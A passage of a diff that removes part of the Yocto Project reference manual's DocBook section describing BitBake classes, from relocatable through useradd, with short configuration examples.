-        The <filename>relocatable</filename> class enables relocation of
-        binaries when they are installed into the sysroot.
-    </para>
-
-    <para>
-        This class makes use of the
-        <link linkend='ref-classes-chrpath'><filename>chrpath</filename></link>
-        class and is used by both the
-        <link linkend='ref-classes-cross'><filename>cross</filename></link>
-        and
-        <link linkend='ref-classes-native'><filename>native</filename></link>
-        classes.
-    </para>
-</section>
-
-<section id='ref-classes-remove-libtool'>
-    <title><filename>remove-libtool.bbclass</filename></title>
-
-    <para>
-        The <filename>remove-libtool</filename> class adds a post function
-        to the
-        <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-        task to remove all <filename>.la</filename> files installed by
-        <filename>libtool</filename>.
-        Removing these files results in them being absent from both the
-        sysroot and target packages.
-    </para>
-
-    <para>
-        If a recipe needs the <filename>.la</filename> files to be installed,
-        then the recipe can override the removal by setting
-        <filename>REMOVE_LIBTOOL_LA</filename> to "0" as follows:
-        <literallayout class='monospaced'>
-     REMOVE_LIBTOOL_LA = "0"
-        </literallayout>
-        <note>
-            The <filename>remove-libtool</filename> class is not enabled by
-            default.
-        </note>
-    </para>
-</section>
-
-<section id='ref-classes-report-error'>
-    <title><filename>report-error.bbclass</filename></title>
-
-    <para>
-        The <filename>report-error</filename> class supports enabling the
-        <ulink url='&YOCTO_DOCS_DEV_URL;#using-the-error-reporting-tool'>error reporting tool</ulink>,
-        which allows you to submit build error information to a central
-        database.
-    </para>
-
-    <para>
-        The class collects debug information for recipe, recipe version, task,
-        machine, distro, build system, target system, host distro, branch,
-        commit, and log.
-        From the information, report files using a JSON format are created and
-        stored in
-        <filename>${</filename><link linkend='var-LOG_DIR'><filename>LOG_DIR</filename></link><filename>}/error-report</filename>.
-    </para>
-</section>
-
-<section id='ref-classes-rm-work'>
-    <title><filename>rm_work.bbclass</filename></title>
-
-    <para>
-        The <filename>rm_work</filename> class supports deletion of temporary
-        workspace, which can ease your hard drive demands during builds.
-    </para>
-
-    <para>
-        The OpenEmbedded build system can use a substantial amount of disk
-        space during the build process.
-        A portion of this space is the work files under the
-        <filename>${TMPDIR}/work</filename> directory for each recipe.
-        Once the build system generates the packages for a recipe, the work
-        files for that recipe are no longer needed.
-        However, by default, the build system preserves these files
-        for inspection and possible debugging purposes.
-        If you would rather have these files deleted to save disk space
-        as the build progresses, you can enable <filename>rm_work</filename>
-        by adding the following to your <filename>local.conf</filename> file,
-        which is found in the
-        <link linkend='build-directory'>Build Directory</link>.
-        <literallayout class='monospaced'>
-    INHERIT += "rm_work"
-        </literallayout>
-        If you are modifying and building source code out of the work directory
-        for a recipe, enabling <filename>rm_work</filename> will potentially
-        result in your changes to the source being lost.
-        To exclude some recipes from having their work directories deleted by
-        <filename>rm_work</filename>, you can add the names of the recipe or
-        recipes you are working on to the <filename>RM_WORK_EXCLUDE</filename>
-        variable, which can also be set in your <filename>local.conf</filename>
-        file.
-        Here is an example:
-        <literallayout class='monospaced'>
-    RM_WORK_EXCLUDE += "busybox glibc"
-        </literallayout>
-    </para>
-</section>
-
-<section id='ref-classes-rootfs*'>
-    <title><filename>rootfs*.bbclass</filename></title>
-
-    <para>
-        The <filename>rootfs*</filename> classes support creating
-        the root filesystem for an image and consist of the following classes:
-        <itemizedlist>
-            <listitem><para>
-                The <filename>rootfs-postcommands</filename> class, which
-                defines filesystem post-processing functions for image recipes.
-                </para></listitem>
-            <listitem><para>
-                The <filename>rootfs_deb</filename> class, which supports
-                creation of root filesystems for images built using
-                <filename>.deb</filename> packages.</para></listitem>
-            <listitem><para>
-                The <filename>rootfs_rpm</filename> class, which supports
-                creation of root filesystems for images built using
-                <filename>.rpm</filename> packages.</para></listitem>
-            <listitem><para>
-                The <filename>rootfs_ipk</filename> class, which supports
-                creation of root filesystems for images built using
-                <filename>.ipk</filename> packages.</para></listitem>
-            <listitem><para>
-                The <filename>rootfsdebugfiles</filename> class, which installs
-                additional files found on the build host directly into the
-                root filesystem.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        The root filesystem is created from packages using one of the
-        <filename>rootfs*.bbclass</filename> files as determined by the
-        <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
-        variable.
-    </para>
-
-    <para>
-        For information on how root filesystem images are created, see the
-        "<ulink url='&YOCTO_DOCS_OM_URL;#image-generation-dev-environment'>Image Generation</ulink>"
-        section in the Yocto Project Overview and Concepts Manual.
-    </para>
-</section>
-
-<section id='ref-classes-sanity'>
-    <title><filename>sanity.bbclass</filename></title>
-
-    <para>
-        The <filename>sanity</filename> class checks to see if prerequisite
-        software is present on the host system so that users can be notified
-        of potential problems that might affect their build.
-        The class also performs basic user configuration checks from
-        the <filename>local.conf</filename> configuration file to
-        prevent common mistakes that cause build failures.
-        Distribution policy usually determines whether to include this class.
-    </para>
-</section>
-
-<section id='ref-classes-scons'>
-    <title><filename>scons.bbclass</filename></title>
-
-    <para>
-        The <filename>scons</filename> class supports recipes that need to
-        build software that uses the SCons build system.
-        You can use the
-        <link linkend='var-EXTRA_OESCONS'><filename>EXTRA_OESCONS</filename></link>
-        variable to specify additional configuration options you want to pass
-        SCons command line.
-    </para>
-</section>
-
-<section id='ref-classes-sdl'>
-    <title><filename>sdl.bbclass</filename></title>
-
-    <para>
-        The <filename>sdl</filename> class supports recipes that need to build
-        software that uses the Simple DirectMedia Layer (SDL) library.
-    </para>
-</section>
-
-<section id='ref-classes-setuptools'>
-    <title><filename>setuptools.bbclass</filename></title>
-
-    <para>
-        The <filename>setuptools</filename> class supports Python
-        version 2.x extensions that use build systems based on
-        <filename>setuptools</filename>.
-        If your recipe uses these build systems, the recipe needs to
-        inherit the <filename>setuptools</filename> class.
-    </para>
-</section>
-
-<section id='ref-classes-setuptools3'>
-    <title><filename>setuptools3.bbclass</filename></title>
-
-    <para>
-        The <filename>setuptools3</filename> class supports Python
-        version 3.x extensions that use build systems based on
-        <filename>setuptools3</filename>.
-        If your recipe uses these build systems, the recipe needs to
-        inherit the <filename>setuptools3</filename> class.
-    </para>
-</section>
-
-<section id='ref-classes-sign_rpm'>
-    <title><filename>sign_rpm.bbclass</filename></title>
-
-    <para>
-        The <filename>sign_rpm</filename> class supports generating signed
-        RPM packages.
-    </para>
-</section>
-
-<section id='ref-classes-sip'>
-    <title><filename>sip.bbclass</filename></title>
-
-    <para>
-        The <filename>sip</filename> class
-        supports recipes that build or package SIP-based Python bindings.
-    </para>
-</section>
-
-<section id='ref-classes-siteconfig'>
-    <title><filename>siteconfig.bbclass</filename></title>
-
-    <para>
-        The <filename>siteconfig</filename> class
-        provides functionality for handling site configuration.
-        The class is used by the
-        <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
-        class to accelerate the
-        <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
-        task.
-    </para>
-</section>
-
-<section id='ref-classes-siteinfo'>
-    <title><filename>siteinfo.bbclass</filename></title>
-
-    <para>
-        The <filename>siteinfo</filename> class provides information about
-        the targets that might be needed by other classes or recipes.
-    </para>
-
-    <para>
-        As an example, consider Autotools, which can require tests that must
-        execute on the target hardware.
-        Since this is not possible in general when cross compiling, site
-        information is used to provide cached test results so these tests can
-        be skipped over but still make the correct values available.
-        The
-        <filename><link linkend='structure-meta-site'>meta/site directory</link></filename>
-        contains test results sorted into different categories such as
-        architecture, endianness, and the <filename>libc</filename> used.
-        Site information provides a list of files containing data relevant to
-        the current build in the
-        <filename><link linkend='var-CONFIG_SITE'>CONFIG_SITE</link></filename> variable
-        that Autotools automatically picks up.
-    </para>
-
-    <para>
-        The class also provides variables like
-        <filename><link linkend='var-SITEINFO_ENDIANNESS'>SITEINFO_ENDIANNESS</link></filename>
-        and <filename><link linkend='var-SITEINFO_BITS'>SITEINFO_BITS</link></filename>
-        that can be used elsewhere in the metadata.
-    </para>
-</section>
-
-<section id='ref-classes-spdx'>
-    <title><filename>spdx.bbclass</filename></title>
-
-    <para>
-        The <filename>spdx</filename> class integrates real-time license
-        scanning, generation of SPDX standard output, and verification
-        of license information during the build.
-        <note>
-            This class is currently at the prototype stage in the 1.6
-            release.
-        </note>
-    </para>
-</section>
-
-<section id='ref-classes-sstate'>
-    <title><filename>sstate.bbclass</filename></title>
-
-    <para>
-        The <filename>sstate</filename> class provides support for Shared
-        State (sstate).
-        By default, the class is enabled through the
-        <link linkend='var-INHERIT_DISTRO'><filename>INHERIT_DISTRO</filename></link>
-        variable's default value.
-    </para>
-
-    <para>
-        For more information on sstate, see the
-        "<ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>Shared State Cache</ulink>"
-        section in the Yocto Project Overview and Concepts Manual.
-    </para>
-</section>
-
-<section id='ref-classes-staging'>
-    <title><filename>staging.bbclass</filename></title>
-
-    <para>
-        The <filename>staging</filename> class installs files into individual
-        recipe work directories for sysroots.
-        The class contains the following key tasks:
-        <itemizedlist>
-            <listitem><para>
-                The
-                <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
-                task, which is responsible for handing the files that end up
-                in the recipe sysroots.
-                </para></listitem>
-            <listitem><para>
-                The
-                <link linkend='ref-tasks-prepare_recipe_sysroot'><filename>do_prepare_recipe_sysroot</filename></link>
-                task (a "partner" task to the
-                <filename>populate_sysroot</filename> task), which installs
-                the files into the individual recipe work directories (i.e.
-                <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>).
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        The code in the <filename>staging</filename> class is complex and
-        basically works in two stages:
-        <itemizedlist>
-            <listitem><para>
-                <emphasis>Stage One:</emphasis>
-                The first stage addresses recipes that have files they want
-                to share with other recipes that have dependencies on the
-                originating recipe.
-                Normally these dependencies are installed through the
-                <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-                task into
-                <filename>${</filename><link linkend='var-D'><filename>D</filename></link><filename>}</filename>.
-                The <filename>do_populate_sysroot</filename> task copies
-                a subset of these files into
-                <filename>${SYSROOT_DESTDIR}</filename>.
-                This subset of files is controlled by the
-                <link linkend='var-SYSROOT_DIRS'><filename>SYSROOT_DIRS</filename></link>,
-                <link linkend='var-SYSROOT_DIRS_NATIVE'><filename>SYSROOT_DIRS_NATIVE</filename></link>,
-                and
-                <link linkend='var-SYSROOT_DIRS_BLACKLIST'><filename>SYSROOT_DIRS_BLACKLIST</filename></link>
-                variables.
-                <note>
-                    Additionally, a recipe can customize the files further by
-                declaring a processing function in the
-                    <link linkend='var-SYSROOT_PREPROCESS_FUNCS'><filename>SYSROOT_PREPROCESS_FUNCS</filename></link>
-                    variable.
-                </note>
-                </para>
-
-                <para>
-                A shared state (sstate) object is built from these files
-                and the files are placed into a subdirectory of
-                <link linkend='structure-build-tmp-sysroots-components'><filename>tmp/sysroots-components/</filename></link>.
-                The files are scanned for hardcoded paths to the original
-                installation location.
-                If the location is found in text files, the hardcoded
-                locations are replaced by tokens and a list of the files
-                needing such replacements is created.
-                These adjustments are referred to as "FIXMEs".
-                The list of files that are scanned for paths is controlled by
-                the
-                <link linkend='var-SSTATE_SCAN_FILES'><filename>SSTATE_SCAN_FILES</filename></link>
-                variable.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Stage Two:</emphasis>
-                The second stage addresses recipes that want to use something
-                from another recipe and declare a dependency on that recipe
-                through the
-                <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
-                variable.
-                The recipe will have a
-                <link linkend='ref-tasks-prepare_recipe_sysroot'><filename>do_prepare_recipe_sysroot</filename></link>
-                task and when
-                this task executes, it creates the
-                <filename>recipe-sysroot</filename> and
-                <filename>recipe-sysroot-native</filename> in the recipe
-                work directory (i.e.
-                <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>).
-                The OpenEmbedded build system creates hard links to copies of the
-                relevant files from <filename>sysroots-components</filename>
-                into the recipe work directory.
-                <note>
-                    If hard links are not possible, the build system uses
-                    actual copies.
-                </note>
-                The build system then addresses any "FIXMEs" to paths as
-                defined from the list created in the first stage.
-                </para>
-
-                <para>
-                Finally, any files in <filename>${bindir}</filename>
-                within the sysroot that have the prefix
-                "<filename>postinst-</filename>" are executed.
-                <note>
-                    Although such sysroot post installation scripts are not
-                    recommended for general use, the files do allow some issues
-                    such as user creation and module indexes to be addressed.
-                </note>
-                </para>
-
-                <para>
-                Because recipes can have other dependencies outside of
-                <filename>DEPENDS</filename> (e.g.
-                <filename>do_unpack[depends] += "tar-native:do_populate_sysroot"</filename>),
-                the sysroot creation function
-                <filename>extend_recipe_sysroot</filename> is also added as
-                a pre-function for those tasks whose dependencies are not
-                through <filename>DEPENDS</filename> but operate similarly.
-                </para>
-
-                <para>
-                When installing dependencies into the sysroot, the code
-                traverses the dependency graph and processes dependencies
-                in exactly the same way as the dependencies would or would not
-                be when installed from sstate.
-                This processing means, for example, a native tool would have
-                its native dependencies added but a target library would not
-                have its dependencies traversed or installed.
-                The same sstate dependency code is used so that
-                builds should be identical regardless of whether sstate
-                was used or not.
-                For a closer look, see the
-                <filename>setscene_depvalid()</filename> function in the
-                <link linkend='ref-classes-sstate'><filename>sstate</filename></link>
-                class.
-                </para>
-
-                <para>
-                The build system is careful to maintain manifests of the files
-                it installs so that any given dependency can be installed as
-                needed.
-                The sstate hash of the installed item is also stored so that
-                if it changes, the build system can reinstall it.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='ref-classes-syslinux'>
-    <title><filename>syslinux.bbclass</filename></title>
-
-    <para>
-        The <filename>syslinux</filename> class provides syslinux-specific
-        functions for building bootable images.
-    </para>
-
-    <para>
-        The class supports the following variables:
-        <itemizedlist>
-            <listitem><para><link linkend='var-INITRD'><filename>INITRD</filename></link>:
-                Indicates list of filesystem images to concatenate and use as
-                an initial RAM disk (initrd).
-                This variable is optional.</para></listitem>
-            <listitem><para><link linkend='var-ROOTFS'><filename>ROOTFS</filename></link>:
-                Indicates a filesystem image to include as the root filesystem.
-                This variable is optional.</para></listitem>
-            <listitem><para><link linkend='var-AUTO_SYSLINUXMENU'><filename>AUTO_SYSLINUXMENU</filename></link>:
-                Enables creating an automatic menu when set to "1".
-                </para></listitem>
-            <listitem><para><link linkend='var-LABELS'><filename>LABELS</filename></link>:
-                Lists targets for automatic configuration.
-                </para></listitem>
-            <listitem><para><link linkend='var-APPEND'><filename>APPEND</filename></link>:
-                Lists append string overrides for each label.
-                </para></listitem>
-            <listitem><para><link linkend='var-SYSLINUX_OPTS'><filename>SYSLINUX_OPTS</filename></link>:
-                Lists additional options to add to the syslinux file.
-                Semicolon characters separate multiple options.
-                </para></listitem>
-            <listitem><para><link linkend='var-SYSLINUX_SPLASH'><filename>SYSLINUX_SPLASH</filename></link>:
-                Lists a background for the VGA boot menu when you are using the
-                boot menu.</para></listitem>
-            <listitem><para><link linkend='var-SYSLINUX_DEFAULT_CONSOLE'><filename>SYSLINUX_DEFAULT_CONSOLE</filename></link>:
-                Set to "console=ttyX" to change kernel boot default console.
-                </para></listitem>
-            <listitem><para><link linkend='var-SYSLINUX_SERIAL'><filename>SYSLINUX_SERIAL</filename></link>:
-                Sets an alternate serial port.
-                Or, turns off serial when the variable is set with an
-                empty string.</para></listitem>
-            <listitem><para><link linkend='var-SYSLINUX_SERIAL_TTY'><filename>SYSLINUX_SERIAL_TTY</filename></link>:
-                Sets an alternate "console=tty..." kernel boot argument.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='ref-classes-systemd'>
-    <title><filename>systemd.bbclass</filename></title>
-
-    <para>
-        The <filename>systemd</filename> class provides support for recipes
-        that install systemd unit files.
-    </para>
-
-    <para>
-        The functionality for this class is disabled unless you have "systemd"
-        in
-        <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.
-    </para>
-
-    <para>
-        Under this class, the recipe or Makefile (i.e. whatever the recipe is
-        calling during the
-        <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-        task) installs unit files into
-        <filename>${</filename><link linkend='var-D'><filename>D</filename></link><filename>}${systemd_unitdir}/system</filename>.
-        If the unit files being installed go into packages other than the
-        main package, you need to set
-        <link linkend='var-SYSTEMD_PACKAGES'><filename>SYSTEMD_PACKAGES</filename></link>
-        in your recipe to identify the packages in which the files will be
-        installed.
-    </para>
-
-    <para>
-        You should set
-        <link linkend='var-SYSTEMD_SERVICE'><filename>SYSTEMD_SERVICE</filename></link>
-        to the name of the service file.
-        You should also use a package name override to indicate the package
-        to which the value applies.
-        If the value applies to the recipe's main package, use
-        <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}</filename>.
-        Here is an example from the connman recipe:
-        <literallayout class='monospaced'>
-     SYSTEMD_SERVICE_${PN} = "connman.service"
-        </literallayout>
-        Services are set up to start on boot automatically unless
-        you have set
-        <link linkend='var-SYSTEMD_AUTO_ENABLE'><filename>SYSTEMD_AUTO_ENABLE</filename></link>
-        to "disable".
-    </para>
-
-    <para>
-        For more information on <filename>systemd</filename>, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#selecting-an-initialization-manager'>Selecting an Initialization Manager</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-</section>
-
-<section id='ref-classes-systemd-boot'>
-    <title><filename>systemd-boot.bbclass</filename></title>
-
-    <para>
-        The <filename>systemd-boot</filename> class provides functions specific
-        to the systemd-boot bootloader for building bootable images.
-        This is an internal class and is not intended to be used directly.
-        <note>
-            The <filename>systemd-boot</filename> class is a result from
-            merging the <filename>gummiboot</filename> class used in previous
-            Yocto Project releases with the <filename>systemd</filename>
-            project.
-        </note>
-        Set the
-        <link linkend='var-EFI_PROVIDER'><filename>EFI_PROVIDER</filename></link>
-        variable to "systemd-boot" to use this class.
-        Doing so creates a standalone EFI bootloader that is not dependent
-        on systemd.
-    </para>
-
-    <para>
-        For information on more variables used and supported in this class,
-        see the
-        <link linkend='var-SYSTEMD_BOOT_CFG'><filename>SYSTEMD_BOOT_CFG</filename></link>,
-        <link linkend='var-SYSTEMD_BOOT_ENTRIES'><filename>SYSTEMD_BOOT_ENTRIES</filename></link>,
-        and
-        <link linkend='var-SYSTEMD_BOOT_TIMEOUT'><filename>SYSTEMD_BOOT_TIMEOUT</filename></link>
-        variables.
-    </para>
-
-    <para>
-        You can also see the
-        <ulink url='http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/'>Systemd-boot documentation</ulink>
-        for more information.
-    </para>
-</section>
-
-<section id='ref-classes-terminal'>
-    <title><filename>terminal.bbclass</filename></title>
-
-    <para>
-        The <filename>terminal</filename> class provides support for starting
-        a terminal session.
-        The
-        <link linkend='var-OE_TERMINAL'><filename>OE_TERMINAL</filename></link>
-        variable controls which terminal emulator is used for the session.
-    </para>
-
-    <para>
-        Other classes use the <filename>terminal</filename> class anywhere a
-        separate terminal session needs to be started.
-        For example, the
-        <link linkend='ref-classes-patch'><filename>patch</filename></link>
-        class assuming
-        <link linkend='var-PATCHRESOLVE'><filename>PATCHRESOLVE</filename></link>
-        is set to "user", the
-        <link linkend='ref-classes-cml1'><filename>cml1</filename></link>
-        class, and the
-        <link linkend='ref-classes-devshell'><filename>devshell</filename></link>
-        class all use the <filename>terminal</filename> class.
-    </para>
-</section>
-
-<section id='ref-classes-testimage*'>
-    <title><filename>testimage*.bbclass</filename></title>
-
-    <para>
-        The <filename>testimage*</filename> classes support running
-        automated tests against images using QEMU and on actual hardware.
-        The classes handle loading the tests and starting the image.
-        To use the classes, you need to perform steps to set up the
-        environment.
-        <note><title>Tip</title>
-            Best practices include using
-            <link linkend='var-IMAGE_CLASSES'><filename>IMAGE_CLASSES</filename></link>
-            rather than
-            <link linkend='var-INHERIT'><filename>INHERIT</filename></link> to
-            inherit the <filename>testimage</filename> class for automated
-            image testing.
-        </note>
-    </para>
-
-    <para>
-        The tests are commands that run on the target system over
-        <filename>ssh</filename>.
-        Each test is written in Python and makes use of the
-        <filename>unittest</filename> module.
-    </para>
-
-    <para>
-        The <filename>testimage.bbclass</filename> runs tests on an image
-        when called using the following:
-        <literallayout class='monospaced'>
-     $ bitbake -c testimage <replaceable>image</replaceable>
-        </literallayout>
-        The <filename>testimage-auto</filename> class runs tests on an image
-        after the image is constructed (i.e.
-        <link linkend='var-TESTIMAGE_AUTO'><filename>TESTIMAGE_AUTO</filename></link>
-        must be set to "1").
-    </para>
-
-    <para>
-        For information on how to enable, run, and create new tests, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-</section>
-
-<section id='ref-classes-testsdk'>
-    <title><filename>testsdk.bbclass</filename></title>
-
-    <para>
-        This class supports running automated tests against
-        software development kits (SDKs).
-        The <filename>testsdk</filename> class runs tests on an SDK when
-        called using the following:
-        <literallayout class='monospaced'>
-     $ bitbake -c testsdk image
-        </literallayout>
-        <note><title>Tip</title>
-            Best practices include using
-            <link linkend='var-IMAGE_CLASSES'><filename>IMAGE_CLASSES</filename></link>
-            rather than
-            <link linkend='var-INHERIT'><filename>INHERIT</filename></link> to
-            inherit the <filename>testsdk</filename> class for automated
-            SDK testing.
-        </note>
-    </para>
-</section>
-
-<section id='ref-classes-texinfo'>
-    <title><filename>texinfo.bbclass</filename></title>
-
-    <para>
-        This class should be inherited by recipes whose upstream packages
-        invoke the <filename>texinfo</filename> utilities at build-time.
-        Native and cross recipes are made to use the dummy scripts provided
-        by <filename>texinfo-dummy-native</filename>, for improved performance.
-        Target architecture recipes use the genuine
-        Texinfo utilities.
-        By default, they use the Texinfo utilities on the host system.
-        <note>
-            If you want to use the Texinfo recipe shipped with the build
-            system, you can remove "texinfo-native" from
-            <link linkend='var-ASSUME_PROVIDED'><filename>ASSUME_PROVIDED</filename></link>
-            and makeinfo from
-            <link linkend='var-SANITY_REQUIRED_UTILITIES'><filename>SANITY_REQUIRED_UTILITIES</filename></link>.
-        </note>
-    </para>
-</section>
-
-<section id='ref-classes-tinderclient'>
-    <title><filename>tinderclient.bbclass</filename></title>
-
-    <para>
-        The <filename>tinderclient</filename> class submits build results to
-        an external Tinderbox instance.
-        <note>
-            This class is currently unmaintained.
-        </note>
-    </para>
-</section>
-
-<section id='ref-classes-toaster'>
-    <title><filename>toaster.bbclass</filename></title>
-
-    <para>
-        The <filename>toaster</filename> class collects information about
-        packages and images and sends them as events that the BitBake
-        user interface can receive.
-        The class is enabled when the Toaster user interface is running.
-    </para>
-
-    <para>
-        This class is not intended to be used directly.
-    </para>
-</section>
-
-<section id='ref-classes-toolchain-scripts'>
-    <title><filename>toolchain-scripts.bbclass</filename></title>
-
-    <para>
-        The <filename>toolchain-scripts</filename> class provides the scripts
-        used for setting up the environment for installed SDKs.
-    </para>
-</section>
-
-<section id='ref-classes-typecheck'>
-    <title><filename>typecheck.bbclass</filename></title>
-
-    <para>
-        The <filename>typecheck</filename> class provides support for
-        validating the values of variables set at the configuration level
-        against their defined types.
-        The OpenEmbedded build system allows you to define the type of a
-        variable using the "type" varflag.
-        Here is an example:
-        <literallayout class='monospaced'>
-     IMAGE_FEATURES[type] = "list"
-        </literallayout>
-    </para>
-</section>
-
-<section id='ref-classes-uboot-config'>
-    <title><filename>uboot-config.bbclass</filename></title>
-
-    <para>
-        The <filename>uboot-config</filename> class provides support for
-        U-Boot configuration for a machine.
-        Specify the machine in your recipe as follows:
-        <literallayout class='monospaced'>
-     UBOOT_CONFIG ??= &lt;default&gt;
-     UBOOT_CONFIG[foo] = "config,images"
-        </literallayout>
-        You can also specify the machine using this method:
-        <literallayout class='monospaced'>
-     UBOOT_MACHINE = "config"
-        </literallayout>
-        See the
-        <link linkend='var-UBOOT_CONFIG'><filename>UBOOT_CONFIG</filename></link>
-        and
-        <link linkend='var-UBOOT_MACHINE'><filename>UBOOT_MACHINE</filename></link>
-        variables for additional information.
-    </para>
-</section>
-
-<section id='ref-classes-uninative'>
-    <title><filename>uninative.bbclass</filename></title>
-
-    <para>
-        Attempts to isolate the build system from the host
-        distribution's C library in order to make re-use of native shared state
-        artifacts across different host distributions practical.
-        With this class enabled, a tarball containing a pre-built C library
-        is downloaded at the start of the build.
-        In the Poky reference distribution this is enabled by default
-        through
-        <filename>meta/conf/distro/include/yocto-uninative.inc</filename>.
-        Other distributions that do not derive from poky can also
-        "<filename>require conf/distro/include/yocto-uninative.inc</filename>"
-        to use this.
-        Alternatively if you prefer, you can build the uninative-tarball recipe
-        yourself, publish the resulting tarball (e.g. via HTTP) and set
-        <filename>UNINATIVE_URL</filename> and
-        <filename>UNINATIVE_CHECKSUM</filename> appropriately.
-        For an example, see the
-        <filename>meta/conf/distro/include/yocto-uninative.inc</filename>.
-    </para>
-
-    <para>
-        The <filename>uninative</filename> class is also used unconditionally
-        by the extensible SDK.
-        When building the extensible SDK,
-        <filename>uninative-tarball</filename> is built and the resulting
-        tarball is included within the SDK.
-    </para>
-</section>
-
-<section id='ref-classes-update-alternatives'>
-    <title><filename>update-alternatives.bbclass</filename></title>
-
-    <para>
-        The <filename>update-alternatives</filename> class helps the
-        alternatives system when multiple sources provide the same command.
-        This situation occurs when several programs that have the same or
-        similar function are installed with the same name.
-        For example, the <filename>ar</filename> command is available from the
-        <filename>busybox</filename>, <filename>binutils</filename> and
-        <filename>elfutils</filename> packages.
-        The <filename>update-alternatives</filename> class handles
-        renaming the binaries so that multiple packages can be installed
-        without conflicts.
-        The <filename>ar</filename> command still works regardless of which
-        packages are installed or subsequently removed.
-        The class renames the conflicting binary in each package and symlinks
-        the highest priority binary during installation or removal of packages.
-    </para>
-
-    <para>
-        To use this class, you need to define a number of variables:
-        <itemizedlist>
-            <listitem><para><link linkend='var-ALTERNATIVE'><filename>ALTERNATIVE</filename></link>
-                </para></listitem>
-            <listitem><para><link linkend='var-ALTERNATIVE_LINK_NAME'><filename>ALTERNATIVE_LINK_NAME</filename></link>
-                </para></listitem>
-            <listitem><para><link linkend='var-ALTERNATIVE_TARGET'><filename>ALTERNATIVE_TARGET</filename></link>
-                </para></listitem>
-            <listitem><para><link linkend='var-ALTERNATIVE_PRIORITY'><filename>ALTERNATIVE_PRIORITY</filename></link>
-                </para></listitem>
-        </itemizedlist>
-        These variables list alternative commands needed by a package,
-        provide pathnames for links, default links for targets, and
-        so forth.
-        For details on how to use this class, see the comments in the
-        <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta/classes/update-alternatives.bbclass'><filename>update-alternatives.bbclass</filename></ulink>
-        file.
-    </para>
-
-    <note>
-        You can use the <filename>update-alternatives</filename> command
-        directly in your recipes.
-        However, this class simplifies things in most cases.
-    </note>
-</section>
-
-<section id='ref-classes-update-rc.d'>
-    <title><filename>update-rc.d.bbclass</filename></title>
-
-    <para>
-        The <filename>update-rc.d</filename> class uses
-        <filename>update-rc.d</filename> to safely install an
-        initialization script on behalf of the package.
-        The OpenEmbedded build system takes care of details such as making
-        sure the script is stopped before a package is removed and started when
-        the package is installed.
-    </para>
-
-    <para>
-        Three variables control this class:
-        <filename><link linkend='var-INITSCRIPT_PACKAGES'>INITSCRIPT_PACKAGES</link></filename>,
-        <filename><link linkend='var-INITSCRIPT_NAME'>INITSCRIPT_NAME</link></filename> and
-        <filename><link linkend='var-INITSCRIPT_PARAMS'>INITSCRIPT_PARAMS</link></filename>.
-        See the variable links for details.
-    </para>
-</section>
-
-<section id='ref-classes-useradd'>
-    <title><filename>useradd*.bbclass</filename></title>
-
-    <para>
-        The <filename>useradd*</filename> classes support the addition of users
-        or groups for usage by the package on the target.
-        For example, if you have packages that contain system services that
-        should be run under their own user or group, you can use these classes
-        to enable creation of the user or group.
-        The
-        <filename>meta-skeleton/recipes-skeleton/useradd/useradd-example.bb</filename>
-        recipe in the <link linkend='source-directory'>Source Directory</link>
-        provides a simple example that shows how to add three
-        users and groups to two packages.
-        See the <filename>useradd-example.bb</filename> recipe for more
-        information on how to use these classes.
-    </para>
-
-    <para>
-        The <filename>useradd_base</filename> class provides basic
-        functionality for user or groups settings.
-    </para>
-
-    <para>
-        The <filename>useradd*</filename> classes support the
-        <link linkend='var-USERADD_PACKAGES'><filename>USERADD_PACKAGES</filename></link>,
-        <link linkend='var-USERADD_PARAM'><filename>USERADD_PARAM</filename></link>,
-        <link linkend='var-GROUPADD_PARAM'><filename>GROUPADD_PARAM</filename></link>,
-        and
-        <link linkend='var-GROUPMEMS_PARAM'><filename>GROUPMEMS_PARAM</filename></link>
-        variables.
-    </para>
-
-    <para>
-        The <filename>useradd-staticids</filename> class supports the addition
-        of users or groups that have static user identification
-        (<filename>uid</filename>) and group identification
-        (<filename>gid</filename>) values.
-    </para>
-
-    <para>
-        The default behavior of the OpenEmbedded build system for assigning
-        <filename>uid</filename> and <filename>gid</filename> values when
-        packages add users and groups during package install time is to
-        add them dynamically.
-        This works fine for programs that do not care what the values of the
-        resulting users and groups become.
-        In these cases, the order of the installation determines the final
-        <filename>uid</filename> and <filename>gid</filename> values.
-        However, if non-deterministic
-        <filename>uid</filename> and <filename>gid</filename> values are a
-        problem, you can override the default, dynamic application of these
-        values by setting static values.
-        When you set static values, the OpenEmbedded build system looks in
-        <link linkend='var-BBPATH'><filename>BBPATH</filename></link> for
-        <filename>files/passwd</filename> and <filename>files/group</filename>
-        files for the values.
-    </para>
-
-    <para>
-        To use static <filename>uid</filename> and <filename>gid</filename>
-        values, you need to set some variables.
-        See the
-        <link linkend='var-USERADDEXTENSION'><filename>USERADDEXTENSION</filename></link>,
-        <link linkend='var-USERADD_UID_TABLES'><filename>USERADD_UID_TABLES</filename></link>,
-        <link linkend='var-USERADD_GID_TABLES'><filename>USERADD_GID_TABLES</filename></link>,
-        and
-        <link linkend='var-USERADD_ERROR_DYNAMIC'><filename>USERADD_ERROR_DYNAMIC</filename></link>
-        variables.
-        You can also see the
